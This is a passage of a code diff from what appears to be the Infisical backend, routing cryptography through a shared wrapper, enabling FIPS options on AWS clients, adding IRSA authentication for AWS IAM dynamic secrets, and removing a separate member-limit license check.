 import { BadRequestError } from "@app/lib/errors";
 import { validateHandlebarTemplate } from "@app/lib/template/validate-handlebars";

@ -39,8 +41,11 @@ type TDeleteElastiCacheUserInput = z.infer<typeof DeleteElasticCacheUserSchema>;
 const ElastiCacheUserManager = (credentials: TBasicAWSCredentials, region: string) => {
  const elastiCache = new ElastiCache({
    region,
+    useFipsEndpoint: crypto.isFipsModeEnabled(),
+    sha256: CustomAWSHasher,
    credentials
  });
+
  const infisicalGroup = "infisical-managed-group-elasticache";

  const ensureInfisicalGroupExists = async (clusterName: string) => {
--- a/backend/src/ee/services/dynamic-secret/providers/aws-iam.ts
+++ b/backend/src/ee/services/dynamic-secret/providers/aws-iam.ts
@ -17,11 +17,12 @@ import {
  RemoveUserFromGroupCommand
 } from "@aws-sdk/client-iam";
 import { AssumeRoleCommand, STSClient } from "@aws-sdk/client-sts";
-import { randomUUID } from "crypto";
 import { z } from "zod";

+import { CustomAWSHasher } from "@app/lib/aws/hashing";
 import { getConfig } from "@app/lib/config/env";
-import { BadRequestError } from "@app/lib/errors";
+import { crypto } from "@app/lib/crypto/cryptography";
+import { BadRequestError, UnauthorizedError } from "@app/lib/errors";
 import { alphaNumericNanoId } from "@app/lib/nanoid";

 import { AwsIamAuthType, DynamicSecretAwsIamSchema, TDynamicProviderFns } from "./models";
@ -49,6 +50,8 @@ export const AwsIamProvider = (): TDynamicProviderFns => {
    if (providerInputs.method === AwsIamAuthType.AssumeRole) {
      const stsClient = new STSClient({
        region: providerInputs.region,
+        useFipsEndpoint: crypto.isFipsModeEnabled(),
+        sha256: CustomAWSHasher,
        credentials:
          appCfg.DYNAMIC_SECRET_AWS_ACCESS_KEY_ID && appCfg.DYNAMIC_SECRET_AWS_SECRET_ACCESS_KEY
            ? {
@ -60,7 +63,7 @@ export const AwsIamProvider = (): TDynamicProviderFns => {

      const command = new AssumeRoleCommand({
        RoleArn: providerInputs.roleArn,
-        RoleSessionName: `infisical-dynamic-secret-${randomUUID()}`,
+        RoleSessionName: `infisical-dynamic-secret-${crypto.nativeCrypto.randomUUID()}`,
        DurationSeconds: 900, // 15 mins
        ExternalId: projectId
      });
@ -72,6 +75,8 @@ export const AwsIamProvider = (): TDynamicProviderFns => {
      }
      const client = new IAMClient({
        region: providerInputs.region,
+        useFipsEndpoint: crypto.isFipsModeEnabled(),
+        sha256: CustomAWSHasher,
        credentials: {
          accessKeyId: assumeRes.Credentials?.AccessKeyId,
          secretAccessKey: assumeRes.Credentials?.SecretAccessKey,
@ -81,8 +86,27 @@ export const AwsIamProvider = (): TDynamicProviderFns => {
      return client;
    }

+    if (providerInputs.method === AwsIamAuthType.IRSA) {
+      // Allow instances to disable automatic service account token fetching (e.g. for shared cloud)
+      if (!appCfg.KUBERNETES_AUTO_FETCH_SERVICE_ACCOUNT_TOKEN) {
+        throw new UnauthorizedError({
+          message: "Failed to get AWS credentials via IRSA: KUBERNETES_AUTO_FETCH_SERVICE_ACCOUNT_TOKEN is not enabled."
+        });
+      }
+
+      // The SDK will automatically pick up credentials from the environment
+      const client = new IAMClient({
+        region: providerInputs.region,
+        useFipsEndpoint: crypto.isFipsModeEnabled(),
+        sha256: CustomAWSHasher
+      });
+      return client;
+    }
+
    const client = new IAMClient({
      region: providerInputs.region,
+      useFipsEndpoint: crypto.isFipsModeEnabled(),
+      sha256: CustomAWSHasher,
      credentials: {
        accessKeyId: providerInputs.accessKey,
        secretAccessKey: providerInputs.secretAccessKey
@ -101,7 +125,7 @@ export const AwsIamProvider = (): TDynamicProviderFns => {
      .catch((err) => {
        const message = (err as Error)?.message;
        if (
-          providerInputs.method === AwsIamAuthType.AssumeRole &&
+          (providerInputs.method === AwsIamAuthType.AssumeRole || providerInputs.method === AwsIamAuthType.IRSA) &&
          // assume role will throw an error asking to provider username, but if so this has access in aws correctly
          message.includes("Must specify userName when calling with non-User credentials")
        ) {
--- a/backend/src/ee/services/dynamic-secret/providers/github.ts
+++ b/backend/src/ee/services/dynamic-secret/providers/github.ts
@ -1,6 +1,7 @@
 import axios from "axios";
 import jwt from "jsonwebtoken";

+import { crypto } from "@app/lib/crypto";
 import { BadRequestError, InternalServerError } from "@app/lib/errors";
 import { alphaNumericNanoId } from "@app/lib/nanoid";
 import { IntegrationUrls } from "@app/services/integration-auth/integration-list";
@ -40,7 +41,7 @@ export const GithubProvider = (): TDynamicProviderFns => {

    let appJwt: string;
    try {
-      appJwt = jwt.sign(jwtPayload, privateKey, { algorithm: "RS256" });
+      appJwt = crypto.jwt().sign(jwtPayload, privateKey, { algorithm: "RS256" });
    } catch (error) {
      let message = "Failed to sign JWT.";
      if (error instanceof jwt.JsonWebTokenError) {
--- a/backend/src/ee/services/dynamic-secret/providers/models.ts
+++ b/backend/src/ee/services/dynamic-secret/providers/models.ts
@ -28,7 +28,8 @@ export enum SqlProviders {

 export enum AwsIamAuthType {
  AssumeRole = "assume-role",
-  AccessKey = "access-key"
+  AccessKey = "access-key",
+  IRSA = "irsa"
 }

 export enum ElasticSearchAuthTypes {
@ -221,6 +222,16 @@ export const DynamicSecretAwsIamSchema = z.preprocess(
      userGroups: z.string().trim().optional(),
      policyArns: z.string().trim().optional(),
      tags: ResourceMetadataSchema.optional()
+    }),
+    z.object({
+      method: z.literal(AwsIamAuthType.IRSA),
+      region: z.string().trim().min(1),
+      awsPath: z.string().trim().optional(),
+      permissionBoundaryPolicyArn: z.string().trim().optional(),
+      policyDocument: z.string().trim().optional(),
+      userGroups: z.string().trim().optional(),
+      policyArns: z.string().trim().optional(),
+      tags: ResourceMetadataSchema.optional()
    })
  ])
 );
--- a/backend/src/ee/services/dynamic-secret/providers/sql-database.ts
+++ b/backend/src/ee/services/dynamic-secret/providers/sql-database.ts
@ -1,8 +1,8 @@
-import { randomInt } from "crypto";
 import handlebars from "handlebars";
 import knex from "knex";
 import { z } from "zod";

+import { crypto } from "@app/lib/crypto/cryptography";
 import { GatewayProxyProtocol, withGatewayProxy } from "@app/lib/gateway";
 import { alphaNumericNanoId } from "@app/lib/nanoid";
 import { validateHandlebarTemplate } from "@app/lib/template/validate-handlebars";
@ -50,7 +50,7 @@ const generatePassword = (provider: SqlProviders, requirements?: PasswordRequire
      parts.push(
        ...Array(required.lowercase)
          .fill(0)
-          .map(() => chars.lowercase[randomInt(chars.lowercase.length)])
+          .map(() => chars.lowercase[crypto.randomInt(chars.lowercase.length)])
      );
    }

@ -58,7 +58,7 @@ const generatePassword = (provider: SqlProviders, requirements?: PasswordRequire
      parts.push(
        ...Array(required.uppercase)
          .fill(0)
-          .map(() => chars.uppercase[randomInt(chars.uppercase.length)])
+          .map(() => chars.uppercase[crypto.randomInt(chars.uppercase.length)])
      );
    }

@ -66,7 +66,7 @@ const generatePassword = (provider: SqlProviders, requirements?: PasswordRequire
      parts.push(
        ...Array(required.digits)
          .fill(0)
-          .map(() => chars.digits[randomInt(chars.digits.length)])
+          .map(() => chars.digits[crypto.randomInt(chars.digits.length)])
      );
    }

@ -74,7 +74,7 @@ const generatePassword = (provider: SqlProviders, requirements?: PasswordRequire
      parts.push(
        ...Array(required.symbols)
          .fill(0)
-          .map(() => chars.symbols[randomInt(chars.symbols.length)])
+          .map(() => chars.symbols[crypto.randomInt(chars.symbols.length)])
      );
    }

@ -89,12 +89,12 @@ const generatePassword = (provider: SqlProviders, requirements?: PasswordRequire
    parts.push(
      ...Array(remainingLength)
        .fill(0)
-        .map(() => allowedChars[randomInt(allowedChars.length)])
+        .map(() => allowedChars[crypto.randomInt(allowedChars.length)])
    );

    // shuffle the array to mix up the characters
    for (let i = parts.length - 1; i > 0; i -= 1) {
-      const j = randomInt(i + 1);
+      const j = crypto.randomInt(i + 1);
      [parts[i], parts[j]] = [parts[j], parts[i]];
    }

--- a/backend/src/ee/services/dynamic-secret/providers/vertica.ts
+++ b/backend/src/ee/services/dynamic-secret/providers/vertica.ts
@ -1,8 +1,8 @@
-import { randomInt } from "crypto";
 import handlebars from "handlebars";
 import knex, { Knex } from "knex";
 import { z } from "zod";

+import { crypto } from "@app/lib/crypto/cryptography";
 import { BadRequestError } from "@app/lib/errors";
 import { GatewayProxyProtocol, withGatewayProxy } from "@app/lib/gateway";
 import { logger } from "@app/lib/logger";
@ -64,7 +64,7 @@ const generatePassword = (requirements?: PasswordRequirements) => {
      parts.push(
        ...Array(required.lowercase)
          .fill(0)
-          .map(() => chars.lowercase[randomInt(chars.lowercase.length)])
+          .map(() => chars.lowercase[crypto.randomInt(chars.lowercase.length)])
      );
    }

@ -72,7 +72,7 @@ const generatePassword = (requirements?: PasswordRequirements) => {
      parts.push(
        ...Array(required.uppercase)
          .fill(0)
-          .map(() => chars.uppercase[randomInt(chars.uppercase.length)])
+          .map(() => chars.uppercase[crypto.randomInt(chars.uppercase.length)])
      );
    }

@ -80,7 +80,7 @@ const generatePassword = (requirements?: PasswordRequirements) => {
      parts.push(
        ...Array(required.digits)
          .fill(0)
-          .map(() => chars.digits[randomInt(chars.digits.length)])
+          .map(() => chars.digits[crypto.randomInt(chars.digits.length)])
      );
    }

@ -88,7 +88,7 @@ const generatePassword = (requirements?: PasswordRequirements) => {
      parts.push(
        ...Array(required.symbols)
          .fill(0)
-          .map(() => chars.symbols[randomInt(chars.symbols.length)])
+          .map(() => chars.symbols[crypto.randomInt(chars.symbols.length)])
      );
    }

@ -103,12 +103,12 @@ const generatePassword = (requirements?: PasswordRequirements) => {
    parts.push(
      ...Array(remainingLength)
        .fill(0)
-        .map(() => allowedChars[randomInt(allowedChars.length)])
+        .map(() => allowedChars[crypto.randomInt(allowedChars.length)])
    );

    // shuffle the array to mix up the characters
    for (let i = parts.length - 1; i > 0; i -= 1) {
-      const j = randomInt(i + 1);
+      const j = crypto.randomInt(i + 1);
      [parts[i], parts[j]] = [parts[j], parts[i]];
    }

--- a/backend/src/ee/services/external-kms/providers/aws-kms.ts
+++ b/backend/src/ee/services/external-kms/providers/aws-kms.ts
@ -1,6 +1,8 @@
 import { CreateKeyCommand, DecryptCommand, DescribeKeyCommand, EncryptCommand, KMSClient } from "@aws-sdk/client-kms";
 import { AssumeRoleCommand, STSClient } from "@aws-sdk/client-sts";
-import { randomUUID } from "crypto";
+
+import { CustomAWSHasher } from "@app/lib/aws/hashing";
+import { crypto } from "@app/lib/crypto/cryptography";

 import { ExternalKmsAwsSchema, KmsAwsCredentialType, TExternalKmsAwsSchema, TExternalKmsProviderFns } from "./model";

@ -8,11 +10,13 @@ const getAwsKmsClient = async (providerInputs: TExternalKmsAwsSchema) => {
  if (providerInputs.credential.type === KmsAwsCredentialType.AssumeRole) {
    const awsCredential = providerInputs.credential.data;
    const stsClient = new STSClient({
-      region: providerInputs.awsRegion
+      region: providerInputs.awsRegion,
+      useFipsEndpoint: crypto.isFipsModeEnabled(),
+      sha256: CustomAWSHasher
    });
    const command = new AssumeRoleCommand({
      RoleArn: awsCredential.assumeRoleArn,
-      RoleSessionName: `infisical-kms-${randomUUID()}`,
+      RoleSessionName: `infisical-kms-${crypto.nativeCrypto.randomUUID()}`,
      DurationSeconds: 900, // 15mins
      ExternalId: awsCredential.externalId
    });
@ -22,6 +26,8 @@ const getAwsKmsClient = async (providerInputs: TExternalKmsAwsSchema) => {

    const kmsClient = new KMSClient({
      region: providerInputs.awsRegion,
+      useFipsEndpoint: crypto.isFipsModeEnabled(),
+      sha256: CustomAWSHasher,
      credentials: {
        accessKeyId: response.Credentials.AccessKeyId,
        secretAccessKey: response.Credentials.SecretAccessKey,
@ -34,6 +40,8 @@ const getAwsKmsClient = async (providerInputs: TExternalKmsAwsSchema) => {
  const awsCredential = providerInputs.credential.data;
  const kmsClient = new KMSClient({
    region: providerInputs.awsRegion,
+    useFipsEndpoint: crypto.isFipsModeEnabled(),
+    sha256: CustomAWSHasher,
    credentials: {
      accessKeyId: awsCredential.accessKey,
      secretAccessKey: awsCredential.secretKey
--- a/backend/src/ee/services/gateway/gateway-service.ts
+++ b/backend/src/ee/services/gateway/gateway-service.ts
@ -1,11 +1,10 @@
-import crypto from "node:crypto";
-
 import { ForbiddenError } from "@casl/ability";
 import * as x509 from "@peculiar/x509";
 import { z } from "zod";

 import { KeyStorePrefixes, PgSqlLock, TKeyStoreFactory } from "@app/keystore/keystore";
 import { getConfig } from "@app/lib/config/env";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { BadRequestError, NotFoundError } from "@app/lib/errors";
 import { pingGatewayAndVerify } from "@app/lib/gateway";
 import { alphaNumericNanoId } from "@app/lib/nanoid";
@ -149,9 +148,9 @@ export const gatewayServiceFactory = ({

      const alg = keyAlgorithmToAlgCfg(CertKeyAlgorithm.RSA_2048);
      // generate root CA
-      const rootCaKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+      const rootCaKeys = await crypto.nativeCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);
      const rootCaSerialNumber = createSerialNumber();
-      const rootCaSkObj = crypto.KeyObject.from(rootCaKeys.privateKey);
+      const rootCaSkObj = crypto.nativeCrypto.KeyObject.from(rootCaKeys.privateKey);
      const rootCaIssuedAt = new Date();
      const rootCaKeyAlgorithm = CertKeyAlgorithm.RSA_2048;
      const rootCaExpiration = new Date(new Date().setFullYear(2045));
@ -173,8 +172,8 @@ export const gatewayServiceFactory = ({
      const clientCaSerialNumber = createSerialNumber();
      const clientCaIssuedAt = new Date();
      const clientCaExpiration = new Date(new Date().setFullYear(2045));
-      const clientCaKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
-      const clientCaSkObj = crypto.KeyObject.from(clientCaKeys.privateKey);
+      const clientCaKeys = await crypto.nativeCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+      const clientCaSkObj = crypto.nativeCrypto.KeyObject.from(clientCaKeys.privateKey);

      const clientCaCert = await x509.X509CertificateGenerator.create({
        serialNumber: clientCaSerialNumber,
@ -200,7 +199,7 @@ export const gatewayServiceFactory = ({
        ]
      });

-      const clientKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+      const clientKeys = await crypto.nativeCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);
      const clientCertSerialNumber = createSerialNumber();
      const clientCert = await x509.X509CertificateGenerator.create({
        serialNumber: clientCertSerialNumber,
@ -226,14 +225,14 @@ export const gatewayServiceFactory = ({
          new x509.ExtendedKeyUsageExtension([x509.ExtendedKeyUsage[CertExtendedKeyUsage.CLIENT_AUTH]], true)
        ]
      });
-      const clientSkObj = crypto.KeyObject.from(clientKeys.privateKey);
+      const clientSkObj = crypto.nativeCrypto.KeyObject.from(clientKeys.privateKey);

      // generate gateway ca
      const gatewayCaSerialNumber = createSerialNumber();
      const gatewayCaIssuedAt = new Date();
      const gatewayCaExpiration = new Date(new Date().setFullYear(2045));
-      const gatewayCaKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
-      const gatewayCaSkObj = crypto.KeyObject.from(gatewayCaKeys.privateKey);
+      const gatewayCaKeys = await crypto.nativeCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+      const gatewayCaSkObj = crypto.nativeCrypto.KeyObject.from(gatewayCaKeys.privateKey);
      const gatewayCaCert = await x509.X509CertificateGenerator.create({
        serialNumber: gatewayCaSerialNumber,
        subject: `O=${identityOrg},CN=Gateway CA`,
@ -326,7 +325,7 @@ export const gatewayServiceFactory = ({
    );

    const gatewayCaAlg = keyAlgorithmToAlgCfg(orgGatewayConfig.rootCaKeyAlgorithm as CertKeyAlgorithm);
-    const gatewayCaSkObj = crypto.createPrivateKey({
+    const gatewayCaSkObj = crypto.nativeCrypto.createPrivateKey({
      key: orgKmsDecryptor({ cipherTextBlob: orgGatewayConfig.encryptedGatewayCaPrivateKey }),
      format: "der",
      type: "pkcs8"
@ -337,7 +336,7 @@ export const gatewayServiceFactory = ({
      })
    );

-    const gatewayCaPrivateKey = await crypto.subtle.importKey(
+    const gatewayCaPrivateKey = await crypto.nativeCrypto.subtle.importKey(
      "pkcs8",
      gatewayCaSkObj.export({ format: "der", type: "pkcs8" }),
      gatewayCaAlg,
@ -346,7 +345,7 @@ export const gatewayServiceFactory = ({
    );

    const alg = keyAlgorithmToAlgCfg(CertKeyAlgorithm.RSA_2048);
-    const gatewayKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+    const gatewayKeys = await crypto.nativeCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);
    const certIssuedAt = new Date();
    // then need to periodically init
    const certExpireAt = new Date(new Date().setMonth(new Date().getMonth() + 1));
@ -367,7 +366,7 @@ export const gatewayServiceFactory = ({
    ];

    const serialNumber = createSerialNumber();
-    const privateKey = crypto.KeyObject.from(gatewayKeys.privateKey);
+    const privateKey = crypto.nativeCrypto.KeyObject.from(gatewayKeys.privateKey);
    const gatewayCertificate = await x509.X509CertificateGenerator.create({
      serialNumber,
      subject: `CN=${identityId},O=${identityOrg},OU=Gateway`,
@ -454,7 +453,7 @@ export const gatewayServiceFactory = ({
      })
    );

-    const privateKey = crypto
+    const privateKey = crypto.nativeCrypto
      .createPrivateKey({
        key: orgKmsDecryptor({ cipherTextBlob: orgGatewayConfig.encryptedClientPrivateKey }),
        format: "der",
@ -588,7 +587,7 @@ export const gatewayServiceFactory = ({
      })
    );

-    const clientSkObj = crypto.createPrivateKey({
+    const clientSkObj = crypto.nativeCrypto.createPrivateKey({
      key: orgKmsDecryptor({ cipherTextBlob: orgGatewayConfig.encryptedClientPrivateKey }),
      format: "der",
      type: "pkcs8"
--- a/backend/src/ee/services/group/group-fns.ts
+++ b/backend/src/ee/services/group/group-fns.ts
@ -1,7 +1,7 @@
 import { Knex } from "knex";

 import { SecretKeyEncoding, TableName, TUsers } from "@app/db/schemas";
-import { decryptAsymmetric, encryptAsymmetric, infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { BadRequestError, ForbiddenRequestError, NotFoundError, ScimRequestError } from "@app/lib/errors";

 import {
@ -94,14 +94,17 @@ const addAcceptedUsersToGroup = async ({
        });
      }

-      const botPrivateKey = infisicalSymmetricDecrypt({
-        keyEncoding: bot.keyEncoding as SecretKeyEncoding,
-        iv: bot.iv,
-        tag: bot.tag,
-        ciphertext: bot.encryptedPrivateKey
-      });
+      const botPrivateKey = crypto
+        .encryption()
+        .symmetric()
+        .decryptWithRootEncryptionKey({
+          keyEncoding: bot.keyEncoding as SecretKeyEncoding,
+          iv: bot.iv,
+          tag: bot.tag,
+          ciphertext: bot.encryptedPrivateKey
+        });

-      const plaintextProjectKey = decryptAsymmetric({
+      const plaintextProjectKey = crypto.encryption().asymmetric().decrypt({
        ciphertext: ghostUserLatestKey.encryptedKey,
        nonce: ghostUserLatestKey.nonce,
        publicKey: ghostUserLatestKey.sender.publicKey,
@ -109,11 +112,10 @@ const addAcceptedUsersToGroup = async ({
      });

      const projectKeysToAdd = usersToAddProjectKeyFor.map((user) => {
-        const { ciphertext: encryptedKey, nonce } = encryptAsymmetric(
-          plaintextProjectKey,
-          user.publicKey,
-          botPrivateKey
-        );
+        const { ciphertext: encryptedKey, nonce } = crypto
+          .encryption()
+          .asymmetric()
+          .encrypt(plaintextProjectKey, user.publicKey, botPrivateKey);
        return {
          encryptedKey,
          nonce,
--- a/backend/src/ee/services/kmip/kmip-service.ts
+++ b/backend/src/ee/services/kmip/kmip-service.ts
@ -1,7 +1,7 @@
 import { ForbiddenError } from "@casl/ability";
 import * as x509 from "@peculiar/x509";
-import crypto, { KeyObject } from "crypto";

+import { crypto } from "@app/lib/crypto/cryptography";
 import { BadRequestError, InternalServerError, NotFoundError } from "@app/lib/errors";
 import { isValidIp } from "@app/lib/ip";
 import { ms } from "@app/lib/ms";
@ -67,6 +67,12 @@ export const kmipServiceFactory = ({
    description,
    permissions
  }: TCreateKmipClientDTO) => {
+    if (crypto.isFipsModeEnabled()) {
+      throw new BadRequestError({
+        message: "KMIP is currently not supported in FIPS mode of operation."
+      });
+    }
+
    const { permission } = await permissionService.getProjectPermission({
      actor,
      actorId,
@ -292,7 +298,7 @@ export const kmipServiceFactory = ({
    }

    const alg = keyAlgorithmToAlgCfg(keyAlgorithm);
-    const leafKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+    const leafKeys = await crypto.nativeCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);

    const extensions: x509.Extension[] = [
      new x509.BasicConstraintsExtension(false),
@ -311,13 +317,13 @@ export const kmipServiceFactory = ({

    const caAlg = keyAlgorithmToAlgCfg(kmipConfig.caKeyAlgorithm as CertKeyAlgorithm);

-    const caSkObj = crypto.createPrivateKey({
+    const caSkObj = crypto.nativeCrypto.createPrivateKey({
      key: decryptor({ cipherTextBlob: kmipConfig.encryptedClientIntermediateCaPrivateKey }),
      format: "der",
      type: "pkcs8"
    });

-    const caPrivateKey = await crypto.subtle.importKey(
+    const caPrivateKey = await crypto.nativeCrypto.subtle.importKey(
      "pkcs8",
      caSkObj.export({ format: "der", type: "pkcs8" }),
      caAlg,
@ -338,7 +344,7 @@ export const kmipServiceFactory = ({
      extensions
    });

-    const skLeafObj = KeyObject.from(leafKeys.privateKey);
+    const skLeafObj = crypto.nativeCrypto.KeyObject.from(leafKeys.privateKey);

    const rootCaCert = new x509.X509Certificate(decryptor({ cipherTextBlob: kmipConfig.encryptedRootCaCertificate }));
    const serverIntermediateCaCert = new x509.X509Certificate(
@ -417,8 +423,8 @@ export const kmipServiceFactory = ({

    // generate root CA
    const rootCaSerialNumber = createSerialNumber();
-    const rootCaKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
-    const rootCaSkObj = KeyObject.from(rootCaKeys.privateKey);
+    const rootCaKeys = await crypto.nativeCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+    const rootCaSkObj = crypto.nativeCrypto.KeyObject.from(rootCaKeys.privateKey);
    const rootCaIssuedAt = new Date();
    const rootCaExpiration = new Date(new Date().setFullYear(new Date().getFullYear() + 20));

@ -440,8 +446,8 @@ export const kmipServiceFactory = ({
    const serverIntermediateCaSerialNumber = createSerialNumber();
    const serverIntermediateCaIssuedAt = new Date();
    const serverIntermediateCaExpiration = new Date(new Date().setFullYear(new Date().getFullYear() + 10));
-    const serverIntermediateCaKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
-    const serverIntermediateCaSkObj = KeyObject.from(serverIntermediateCaKeys.privateKey);
+    const serverIntermediateCaKeys = await crypto.nativeCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+    const serverIntermediateCaSkObj = crypto.nativeCrypto.KeyObject.from(serverIntermediateCaKeys.privateKey);

    const serverIntermediateCaCert = await x509.X509CertificateGenerator.create({
      serialNumber: serverIntermediateCaSerialNumber,
@ -471,8 +477,8 @@ export const kmipServiceFactory = ({
    const clientIntermediateCaSerialNumber = createSerialNumber();
    const clientIntermediateCaIssuedAt = new Date();
    const clientIntermediateCaExpiration = new Date(new Date().setFullYear(new Date().getFullYear() + 10));
-    const clientIntermediateCaKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
-    const clientIntermediateCaSkObj = KeyObject.from(clientIntermediateCaKeys.privateKey);
+    const clientIntermediateCaKeys = await crypto.nativeCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+    const clientIntermediateCaSkObj = crypto.nativeCrypto.KeyObject.from(clientIntermediateCaKeys.privateKey);

    const clientIntermediateCaCert = await x509.X509CertificateGenerator.create({
      serialNumber: clientIntermediateCaSerialNumber,
@ -637,7 +643,8 @@ export const kmipServiceFactory = ({
    }

    const alg = keyAlgorithmToAlgCfg(keyAlgorithm);
-    const leafKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+
+    const leafKeys = await crypto.nativeCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);

    const extensions: x509.Extension[] = [
      new x509.BasicConstraintsExtension(false),
@ -685,13 +692,13 @@ export const kmipServiceFactory = ({
      cipherTextBlob: kmipOrgConfig.encryptedServerIntermediateCaChain
    }).toString("utf-8");

-    const caSkObj = crypto.createPrivateKey({
+    const caSkObj = crypto.nativeCrypto.createPrivateKey({
      key: decryptor({ cipherTextBlob: kmipOrgConfig.encryptedServerIntermediateCaPrivateKey }),
      format: "der",
      type: "pkcs8"
    });

-    const caPrivateKey = await crypto.subtle.importKey(
+    const caPrivateKey = await crypto.nativeCrypto.subtle.importKey(
      "pkcs8",
      caSkObj.export({ format: "der", type: "pkcs8" }),
      caAlg,
@ -712,7 +719,7 @@ export const kmipServiceFactory = ({
      extensions
    });

-    const skLeafObj = KeyObject.from(leafKeys.privateKey);
+    const skLeafObj = crypto.nativeCrypto.KeyObject.from(leafKeys.privateKey);
    const certificateChain = `${caCertObj.toString("pem")}\n${decryptedCaCertChain}`.trim();

    await kmipOrgServerCertificateDAL.create({
--- a/backend/src/ee/services/ldap-config/ldap-config-service.ts
+++ b/backend/src/ee/services/ldap-config/ldap-config-service.ts
@ -1,11 +1,11 @@
 import { ForbiddenError } from "@casl/ability";
-import jwt from "jsonwebtoken";

 import { OrgMembershipStatus, TableName, TLdapConfigsUpdate, TUsers } from "@app/db/schemas";
 import { TGroupDALFactory } from "@app/ee/services/group/group-dal";
 import { addUsersToGroupByUserIds, removeUsersFromGroupByUserIds } from "@app/ee/services/group/group-fns";
 import { TUserGroupMembershipDALFactory } from "@app/ee/services/group/user-group-membership-dal";
 import { getConfig } from "@app/lib/config/env";
+import { crypto } from "@app/lib/crypto";
 import { BadRequestError, ForbiddenRequestError, NotFoundError } from "@app/lib/errors";
 import { AuthMethod, AuthTokenType } from "@app/services/auth/auth-type";
 import { TAuthTokenServiceFactory } from "@app/services/auth-token/auth-token-service";
@ -361,13 +361,6 @@ export const ldapConfigServiceFactory = ({
      });
    } else {
      const plan = await licenseService.getPlan(orgId);
-      if (plan?.slug !== "enterprise" && plan?.memberLimit && plan.membersUsed >= plan.memberLimit) {
-        // limit imposed on number of members allowed / number of members used exceeds the number of members allowed
-        throw new BadRequestError({
-          message: "Failed to create new member via LDAP due to member limit reached. Upgrade plan to add more members."
-        });
-      }
-
      if (plan?.slug !== "enterprise" && plan?.identityLimit && plan.identitiesUsed >= plan.identityLimit) {
        // limit imposed on number of identities allowed / number of identities used exceeds the number of identities allowed
        throw new BadRequestError({
@ -536,7 +529,7 @@ export const ldapConfigServiceFactory = ({
    const isUserCompleted = Boolean(user.isAccepted);
    const userEnc = await userDAL.findUserEncKeyByUserId(user.id);

-    const providerAuthToken = jwt.sign(
+    const providerAuthToken = crypto.jwt().sign(
      {
        authTokenType: AuthTokenType.PROVIDER_TOKEN,
        userId: user.id,
--- a/backend/src/ee/services/license/licence-enums.ts
+++ b/backend/src/ee/services/license/licence-enums.ts
@ -1,5 +1,4 @@
 export const BillingPlanRows = {
-  MemberLimit: { name: "Organization member limit", field: "memberLimit" },
  IdentityLimit: { name: "Organization identity limit", field: "identityLimit" },
  WorkspaceLimit: { name: "Project limit", field: "workspaceLimit" },
  EnvironmentLimit: { name: "Environment limit", field: "environmentLimit" },
--- a/backend/src/ee/services/license/license-fns.ts
+++ b/backend/src/ee/services/license/license-fns.ts
@ -58,7 +58,8 @@ export const getDefaultOnPremFeatures = (): TFeatureSet => ({
  sshHostGroups: false,
  secretScanning: false,
  enterpriseSecretSyncs: false,
-  enterpriseAppConnections: false
+  enterpriseAppConnections: false,
+  fips: false
 });

 export const setupLicenseRequestWithStore = (
--- a/backend/src/ee/services/license/license-service.ts
+++ b/backend/src/ee/services/license/license-service.ts
@ -442,9 +442,7 @@ export const licenseServiceFactory = ({
        rows: data.rows.map((el) => {
          let used = "-";

-          if (el.name === BillingPlanRows.MemberLimit.name) {
-            used = orgMembersUsed.toString();
-          } else if (el.name === BillingPlanRows.WorkspaceLimit.name) {
+          if (el.name === BillingPlanRows.WorkspaceLimit.name) {
            used = projectCount.toString();
          } else if (el.name === BillingPlanRows.IdentityLimit.name) {
            used = (identityUsed + orgMembersUsed).toString();
@ -464,12 +462,10 @@ export const licenseServiceFactory = ({
        const allowed = onPremFeatures[field as keyof TFeatureSet];
        let used = "-";

-        if (field === BillingPlanRows.MemberLimit.field) {
-          used = orgMembersUsed.toString();
-        } else if (field === BillingPlanRows.WorkspaceLimit.field) {
+        if (field === BillingPlanRows.WorkspaceLimit.field) {
          used = projectCount.toString();
        } else if (field === BillingPlanRows.IdentityLimit.field) {
-          used = identityUsed.toString();
+          used = (identityUsed + orgMembersUsed).toString();
        }

        return {
--- a/backend/src/ee/services/license/license-types.ts
+++ b/backend/src/ee/services/license/license-types.ts
@ -75,6 +75,7 @@ export type TFeatureSet = {
  secretScanning: false;
  enterpriseSecretSyncs: false;
  enterpriseAppConnections: false;
+  fips: false;
 };

 export type TOrgPlansTableDTO = {
--- a/backend/src/ee/services/oidc/oidc-config-service.ts
+++ b/backend/src/ee/services/oidc/oidc-config-service.ts
@ -1,6 +1,5 @@
 /* eslint-disable @typescript-eslint/no-unsafe-call */
 import { ForbiddenError } from "@casl/ability";
-import jwt from "jsonwebtoken";
 import { Issuer, Issuer as OpenIdIssuer, Strategy as OpenIdStrategy, TokenSet } from "openid-client";

 import { OrgMembershipStatus, TableName, TUsers } from "@app/db/schemas";
@ -13,6 +12,7 @@ import { TLicenseServiceFactory } from "@app/ee/services/license/license-service
 import { OrgPermissionActions, OrgPermissionSubjects } from "@app/ee/services/permission/org-permission";
 import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types";
 import { getConfig } from "@app/lib/config/env";
+import { crypto } from "@app/lib/crypto";
 import { BadRequestError, ForbiddenRequestError, NotFoundError, OidcAuthError } from "@app/lib/errors";
 import { OrgServiceActor } from "@app/lib/types";
 import { ActorType, AuthMethod, AuthTokenType } from "@app/services/auth/auth-type";
